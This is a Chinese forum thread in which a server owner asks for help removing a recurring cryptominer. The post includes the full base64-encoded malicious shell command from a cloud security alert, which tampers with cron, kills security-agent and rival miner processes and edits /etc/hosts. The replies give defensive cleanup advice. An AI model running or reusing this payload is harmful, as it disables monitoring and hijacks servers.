找大佬求助, ubuntu 16.04 中木马了,杀不干净

2020-06-11 11:49:14 +08:00
 15399905591

使用 top 查看到这样一个进程,干掉以后过一段时间就会出现

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
6625 postgres 20 0 2435624 2.035g 4 R 100.0 52.7 1008:52 yYGsf4

阿里云那边告警发现这样一个脚本,但是找不到定时任务,怀疑是 postgresql 导致的,但是不知道从那里开始查找:

:sh -c echo b1lyenF6TXcxS1J5SVMxS0RsdnVDeVFBdzBmNGh5SEs5cmxOcHluYlYwTVM0a0crTjQ2OHhaUVlDdmZVRHpvZgpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgpmaW5kIC9ldGMvY3Jvbip8eGFyZ3MgY2hhdHRyIC1pCmZpbmQgL3Zhci9zcG9vbC9jcm9uKnx4YXJncyBjaGF0dHIgLWkKY3JvbnRhYiAtbCB8Z3JlcCAtaXZFICJybS1tYWx8a2lsbGVyfGtpbGxNaW5lcnwuXC9va2F8XC91cGR8YXB0aXR1ZGV8YmFzaHRlbXB8Y29uZmlncmN8dG1wMDB8Y3VybHx3Z2V0fGtwY2N2fHh6Zml4fHRoMnBzfGJmZmJlfHJ2bHNzfHdsdmx5fHVjeGluIiB8Y3JvbnRhYiAtCmNyb250YWIgLWwgO2dyZXAgLWlSRSAicm0tbWFsfGtpbGxlcnxrbGxsTWluZXJ8Llwvb2thfFwvdXBkfGFwdGl0dWRlfGJhc2h0ZW1wfGNvbmZpZ3JjfHRtcDAwfGN1cmx8d2dldHxrcGNjdnx4emZpeHx0aDJwc3xiZmZiZXxydmxzc3x3bHZseXx1Y3hpbiIgL2V0Yy9jcm9uLip8Y3V0IC1mIDEgLWQgOnx4YXJncyBybSAtZjtybSAtZiAvZXRjL2Nyb24uZC8we2twY2N2LHh6Zml4LHRoMnBzLGJmZmJlLHJ2bHNzLHdsdmx5LHVjeGlufQpwa2lsbCAtOSAtZiAiLi9jcm9ufC4vb2thfC90bXAvZGRnc3wvdG1wL2lka3wvdG1wL2phdmF8L3RtcC9rZWVwfC90bXAvdWRldnN8L3RtcC91ZGt8L3RtcC91cGRhdGUuc2h8L3RtcC95YXJufC91c3IvYmluL25ldGZzfDgyMjB8QWxpSGlkc3xBbGlZdW5EdW58RG9uYWxkfEhUOHN8Sm9uYXNvbnxzYWx0LXN0b3JlfHNhbHQtbWluaW9ufFN6ZFhNfFgxMy11bml4fFgxNy11bml4fFxbc3RlYVxdfGFlZ2lzX3xBbGlZdW5EdW58QWxpSGlkc3xBbGlIaXBzfEFsaVl1bkR1blVwZGF0ZWFsaXl1bi1zZXJ2aWNlfGF6aXBsfGJhc2g2NHxjci5zaHxjcmxvZ2VyfGNyb25kc3xjcnVufGNyeXB0b25pZ2h0fGN1cm58Y3Vycm58ZGRnc3xkaGNsZWludHxmcy1tYW5hZ2VyfGdmMTI4bXVsfGhhdmVnZWRzfGh0dHBkenxpcnFiYWxhbmNlZHxqYXZhLWN8a2F1ZGl0ZWR8a2RldnRtcGZzaXxrZXJiZXJvZHN8a2h1Z2VwYWdlZHN8a2luc2luZ3xraW50ZWdyaXR5ZHN8a3BzbW91c2Vkc3xrc3dhcGVkfGt0aHJlYWRkc3xrdGhyb3RsZHN8a3cwfGt3b3JrZXJkc3xrd29ya3JlfGt3cm9rZXJ8TWFjcm9ufG1ld3JzfG1pZ3JhdGlvbnN8bWluZXJ8bW1tfG1yLnNofG11aHN0aXxteWdpdHxuZXRkbnN8bmV0d29ya3NlcnZpY2V8b3JnZnN8cGFtZGlja3N8cGFzdGViaW58cVczeFR8cXdlZmRhc3xyY3RsY2xpfHNsZWVwfHN0cmF0dW18c3VzdGVzfHN1c3RzZXxzeXNndWFyZHxzeXNndWVyZHxzeXN0ZWFtZHxzeXN0ZW1kLW5ldHdvcmt8c3lzdXBkYXRlfHN5c3VwZGF0YXx0MDBsc3x0aGlzeHhzfFRydW1wfHVwZGF0ZS5zaHx2VHRISHx3YXRjaGJvZ3x3YXRjaGJ1Z3x3YXRjaG9nfHdpcGVmc3x3blRLWWd8eDNXcXx4aWd8eG1yfHplcjAiCm5ldHN0YXQgLWFudHB8Z3JlcCAtRSAiMTAzLjMuNjIuNjR8MTA0LjE0MC4yMDEuNDJ8MTA0LjE0MC4yNDQuMTg2fDEwNy4xNzguMTA0LjEwfDEwNy4xOTEuOTkuMjIxfDEwNy4xOTEuOTkuOTV8MTE2LjIwMy43My4yNDB8MTMxLjE1My41Ni45OHwxMzEuMTUzLjc2LjEzMHwxMzYuMjQzLjEwMi4xNTR8MTM4LjIwMS4yMC44OXwxMzguMjAxLjI3LjI0M3wxMzguMjAxLjM2LjI0OXwxMzkuMTYyLjEzMi43MHwxMzkuMTYyLjYwLjIyMHwxMzkuMTYyLjgxLjkwfDEzOS45OS4xMDEuMTk3fDEzOS45OS4xMDEuMTk4fDEzOS45OS4xMDEuMjMyfDEzOS45OS4xMDIuNzB8MTM5Ljk5LjEwMi43MXwxMzkuOTkuMTAyLjcyfDEzOS45OS4xMDIuNzN8MTM5Ljk5LjEwMi43NHwxMzkuOTkuMTIwLjUwfDEzOS45OS4xMjAuNzV8MTM5Ljk5LjEyMy4xOTZ8MTM5Ljk5LjEyNC4xNzB8MTM5Ljk5LjEyNS4zOHwxMzkuOTkuMTU2LjMwfDEzOS45OS42OC4xMjh8MTQyLjQ0LjI0Mi4xMDB8MTQyLjQ0LjI0My42fDE0NC4yMTcuMTQuMTA5fDE0NC4yMTcuMTQuMTM5fDE0Ny4xMzUuMzcuMzF8MTQ5LjIwMi40Mi4xNzR8MTQ5LjIwMi44My4xNzF8MTUuMjM2LjEwMC4xNDF8MTUxLjgwLjE0NC4xODh8MTU4LjY5LjI1LjYyfDE1OC42OS4yNS43MXwxNTguNjkuMjUuNzd8MTYzLjE3Mi4yMDMuMTc4fDE2My4xNzIuMjA2LjY3fDE2My4xNzIuMjA3LjY5fDE2My4xNzIuMjI2LjExNHwxNjMuMTcyLjIyNi4xMzd8MTcyLjEwNC4xNDMuMjI0fDE3Mi4xMDQuMTUxLjIzMnwxNzIuMTA0LjE1OS4xNTh8MTcyLjEwNC4xNjUuMTkxfDE3Mi4xMDQuMjQ3LjIxfDE3Mi4xMDQuNzYuMjF8MTcyLjEwNS4yMDUuNTh8MTcyLjEwNS4yMDUuNjh8MTcyLjEwNS4yMTAuMTE3fDE3Mi4xMDUuMjExLjI1MHwxNzIuMTA1LjIzNS45N3wxNzguNjMuMTAwLjE5N3wxOC4xODAuNzIuMjE5fDE4LjIxMC4xMjYuNDB8MTkyLjExMC4xNjAuMTE0fDE5Mi45OS42OS4xNzB8MTk1LjE1NC42Mi4yNDd8MTk1LjIwMS4xMi4xMDd8MTk5LjIzMS44NS4xMjR8MjA3LjI0Ni4xMDAuMTk4fDIxMy4zMi4yOS4xNDN8MjEzLjMyLjc0LjE1N3wyMTcuMTgyLjE2OS4xNDh8MjMuODguMTYwLjE0MHwzLjAuMTkzLjIwMHwzNy4xODcuOTUuMTEwfDM3LjU5LjQzLjEzMXwzNy41OS40NC4xOTN8MzcuNTkuNDQuOTN8MzcuNTkuNTQuMjA1fDM3LjU5LjU1LjYwfDM3LjkuMy4yNnw0NS4zMi43MS44Mnw0NS43Ni42NS4yMjN8NDUuNzkuMTkyLjEzN3w0NS43OS4yMDAuOTd8NDUuNzkuMjA0LjI0MXw0NS43OS4yMTAuNDh8NDYuNC4xMjAuMTh8NDcuMTAxLjMwLjEyNHw1LjE5Ni4xMy4yOXw1LjE5Ni4yMy4yNDB8NTEuMTUuNTQuMTAyfDUxLjE1LjU1LjEwMHw1MS4xNS41NS4xNjJ8NTEuMTUuNTguMjI0fDUxLjE1LjY1LjE4Mnw1MS4xNS42Ny4xN3w1MS4xNS42OS4xMzZ8NTEuMTUuNzguNjh8NTEuMjU1LjM0LjExOHw1MS4yNTUuMzQuNzl8NTEuMjU1LjM0LjgwfDUxLjgxLjI0NS40MHw1NC4xODguMjIzLjIwNnw1NC4zNy43LjIwOHw2Ni40Mi4xMDUuMTQ2fDc4LjQ2LjQ5LjIyMnw3OC40Ni44Ny4xODF8ODEuMjUuNTUuNzl8ODEuOTEuMTg5LjI0NXw4OC45OS4xNDIuMTYzfDg4Ljk5LjE5My4yNDB8ODguOTkuMjQyLjkyfDkxLjEyMS4xNDAuMTY3fDk0LjEzMC4xMi4yN3w5NC4xMzAuMTIuMzB8OTQuMTMwLjE0My4xNjJ8OTQuMTMwLjE2NS44NXw5NC4xMzAuMTY1Ljg3fDk0LjEzMC4yMzkuMTV8OTQuMjMuMjMuNTJ8OTQuMjMuMjQ3LjIyNnw5NS4yMTYuMjA5LjY3fDIwNS4xODUuMTE4LjIwNCJ8YXdrIHsncHJpbnQgJE5GJ30gfGN1dCAtZC8gLWYxfHhhcmdzIGtpbGwgLTkKc3MgLWFudHAgfGdyZXAgLUUgIjEwMy4zLjYyLjY0fDEwNC4xNDAuMjAxLjQyfDEwNC4xNDAuMjQ0LjE4NnwxMDcuMTc4LjEwNC4xMHwxMDcuMTkxLjk5LjIyMXwxMDcuMTkxLjk5Ljk1fDExNi4yMDMuNzMuMjQwfDEzMS4xNTMuNTYuOTh8MTMxLjE1My43Ni4xMzB8MTM2LjI0My4xMDIuMTU0fDEzOC4yMDEuMjAuODl8MTM4LjIwMS4yNy4yNDN8MTM4LjIwMS4zNi4yNDl8MTM5LjE2Mi4xMzIuNzB8MTM5LjE2Mi42MC4yMjB8MTM5LjE2Mi44MS45MHwxMzkuOTkuMTAxLjE5N3wxMzkuOTkuMTAxLjE5OHwxMzkuOTkuMTAxLjIzMnwxMzkuOTkuMTAyLjcwfDEzOS45OS4xMDIuNzF8MTM5Ljk5LjEwMi43MnwxMzkuOTkuMTAyLjczfDEzOS45OS4xMDIuNzR8MTM5Ljk5LjEyMC41MHwxMzkuOTkuMTIwLjc1fDEzOS45OS4xMjMuMTk2fDEzOS45OS4xMjQuMTcwfDEzOS45OS4xMjUuMzh8MTM5Ljk5LjE1Ni4zMHwxMzkuOTkuNjguMTI4fDE0Mi40NC4yNDIuMTAwfDE0Mi40NC4yNDMuNnwxNDQuMjE3LjE0LjEwOXwxNDQuMjE3LjE0LjEzOXwxNDcuMTM1LjM3LjMxfDE0OS4yMDIuNDIuMTc0fDE0OS4yMDIuODMuMTcxfDE1LjIzNi4xMDAuMTQxfDE1MS44MC4xNDQuMTg4fDE1OC42OS4yNS42MnwxNTguNjkuMjUuNzF8MTU4LjY5LjI1Ljc3fDE2My4xNzIuMjAzLjE3OHwxNjMuMTcyLjIwNi42N3wxNjMuMTcyLjIwNy42OXwxNjMuMTcyLjIyNi4xMTR8MTYzLjE3Mi4yMjYuMTM3fDE3Mi4xMDQuMTQzLjIyNHwxNzIuMTA0LjE1MS4yMzJ8MTcyLjEwNC4xNTkuMTU4fDE3Mi4xMDQuMTY1LjE5MXwxNzIuMTA0LjI0Ny4yMXwxNzIuMTA0Ljc2LjIxfDE3Mi4xMDUuMjA1LjU4fDE3Mi4xMDUuMjA1LjY4fDE3Mi4xMDUuMjEwLjExN3wxNzIuMTA1LjIxMS4yNTB8MTcyLjEwNS4yMzUuOTd8MTc4LjYzLjEwMC4xOTd8MTguMTgwLjcyLjIxOXwxOC4yMTAuMTI2LjQwfDE5Mi4xMTAuMTYwLjExNHwxOTIuOTkuNjkuMTcwfDE5NS4xNTQuNjIuMjQ3fDE5NS4yMDEuMTIuMTA3fDE5OS4yMzEuODUuMTI0fDIwNy4yNDYuMTAwLjE5OHwyMTMuMzIuMjkuMTQzfDIxMy4zMi43NC4xNTd8MjE3LjE4Mi4xNjkuMTQ4fDIzLjg4LjE2MC4xNDB8My4wLjE5My4yMDB8MzcuMTg3Ljk1LjExMHwzNy41OS40My4xMzF8MzcuNTkuNDQuMTkzfDM3LjU5LjQ0LjkzfDM3LjU5LjU0LjIwNXwzNy41OS41NS42MHwzNy45LjMuMjZ8NDUuMzIuNzEuODJ8NDUuNzYuNjUuMjIzfDQ1Ljc5LjE5Mi4xMzd8NDUuNzkuMjAwLjk3fDQ1Ljc5LjIwNC4yNDF8NDUuNzkuMjEwLjQ4fDQ2LjQuMTIwLjE4fDQ3LjEwMS4zMC4xMjR8NS4xOTYuMTMuMjl8NS4xOTYuMjMuMjQwfDUxLjE1LjU0LjEwMnw1MS4xNS41NS4xMDB8NTEuMTUuNTUuMTYyfDUxLjE1LjU4LjIyNHw1MS4xNS42NS4xODJ8NTEuMTUuNjcuMTd8NTEuMTUuNjkuMTM2fDUxLjE1Ljc4LjY4fDUxLjI1NS4zNC4xMTh8NTEuMjU1LjM0Ljc5fDUxLjI1NS4zNC44MHw1MS44MS4yNDUuNDB8NTQuMTg4LjIyMy4yMDZ8NTQuMzcuNy4yMDh8NjYuNDIuMTA1LjE0Nnw3OC40Ni40OS4yMjJ8NzguNDYuODcuMTgxfDgxLjI1LjU1Ljc5fDgxLjkxLjE4OS4yNDV8ODguOTkuMTQyLjE2M3w4OC45OS4xOTMuMjQwfDg4Ljk5LjI0Mi45Mnw5MS4xMjEuMTQwLjE2N3w5NC4xMzAuMTIuMjd8OTQuMTMwLjEyLjMwfDk0LjEzMC4xNDMuMTYyfDk0LjEzMC4xNjUuODV8OTQuMTMwLjE2NS44N3w5NC4xMzAuMjM5LjE1fDk0LjIzLjIzLjUyfDk0LjIzLjI0Ny4yMjZ8OTUuMjE2LjIwOS42N3wyMDUuMTg1LjExOC4yMDQiIHxhd2sgLUYsIHsncHJpbnQgJDInfXxzZWQgJ3MvcGlkPS8vZycgfHhhcmdzIGtpbGwgLTkgCmNoYXR0ciAtaSAvZXRjL2hvc3RzCmdyZXAgLXEgcnl1ayAgL2V0Yy9ob3N0cyAmJiBzZWQgLWkgJy9yeXVrL2QnICAvZXRjL2hvc3RzCmdyZXAgLXEgdG9yMncgL2V0Yy9ob3N0cyAmJiBzZWQgLWkgJy90b3Iydy9kJyAvZXRjL2hvc3RzCnJtIC1mIC9yb290L2NsZWFyLnNoCg== |base64 -d|bash

1314 次点击
所在节点    Ubuntu
15 条回复
id7368
2020-06-11 12:01:40 +08:00
你得把文件也杀了,用 ps 命令查具体文件位置,不过多半在 tmp 文件夹里,到这里看看有没有乱七八糟名字的文件夹
15399905591
2020-06-11 12:22:12 +08:00
@id7368 他这个好像是下载下来的,我找不到它在那里启动的
superrichman
2020-06-11 12:26:51 +08:00
crontab -l
ghostwwg
2020-06-11 13:05:46 +08:00
放弃吧,重装是王道
vinsec
2020-06-11 13:18:09 +08:00
lsof -p pid 查下相关的文件 然后 lsof file 进一步看下相关联的进程
7654
2020-06-11 13:20:17 +08:00
它的操作步骤都在那个 base64 里面啊,按图索骥
wooyuntest
2020-06-11 13:29:49 +08:00
应该是通过某个有漏洞的服务打进来然后种了个挖矿木马,应该还有另外的脚本。 排查下 tmp 目录、crontab 、还有 ssh 公钥以及防火墙。搞不定可以让我上去看看。
4linuxfun
2020-06-11 13:32:43 +08:00
先找出怎么入的,然后重装吧
limboMu
2020-06-11 13:58:22 +08:00
前些日子,我在玩 redis 暴露在公网上了,也被植入挖矿木马。
limboMu
2020-06-11 13:58:57 +08:00
@limboMu 然而,我用 docker 启动的,直接杀了容器就好了,为啥不用容器呢?
Kelan
2020-06-11 14:00:35 +08:00
USR 已经很明确了发生了什么了

另外这和 Python 有什么关系?
asilin
2020-06-11 14:04:42 +08:00
很简单,因为是从 postgres 用户侵入的,所以备份 postgres 服务后,关停 crontab 服务,使用 find 删除掉所有 postgres 用户的文件,kill 掉所有 postgres 用户的进程,然后删除掉 postgres 用户。

只要 postgres 用户提权不到 root,那么其翻不了任何大浪的,干掉用户就完事。
migu123456
2020-06-11 14:31:23 +08:00
把阿里云服务关闭,杀死掉,你这个很有可能是开启了阿里云那个 ssh 证书访问了,可以去后台删除掉
lyi4ng
2020-06-11 20:33:49 +08:00
自己解一下 base64 看一下嘛,大概流程就是动了 crontab,按照进程名 kill 了一大堆进程,按照网络连接目标又 kill 了一大堆,然后修改了你的 /etc/hosts,最后删的 clear.sh 看名字好像是个扫尾的,不知道从哪冒出来的

又是 ryuk 又是 tor2web 的,再看看你这个样子应该就是个挖矿木马吧

至于干掉后出现啊,你现在给的这一大段就是个守护进程啦,先 kiil 掉行不行啊~看看这个 https://www.cnblogs.com/royfans/p/12722792.html

至于其余的什么 init.d,systemd.d,LKM,ptrace 之类的应该还没这么大功夫搞你,就是个随处可见的开源挖矿脚本吧
15399905591
2020-06-19 18:08:55 +08:00
@lyi4ng 感谢大佬,跟你所发文章的是一模一样的

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/680615

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX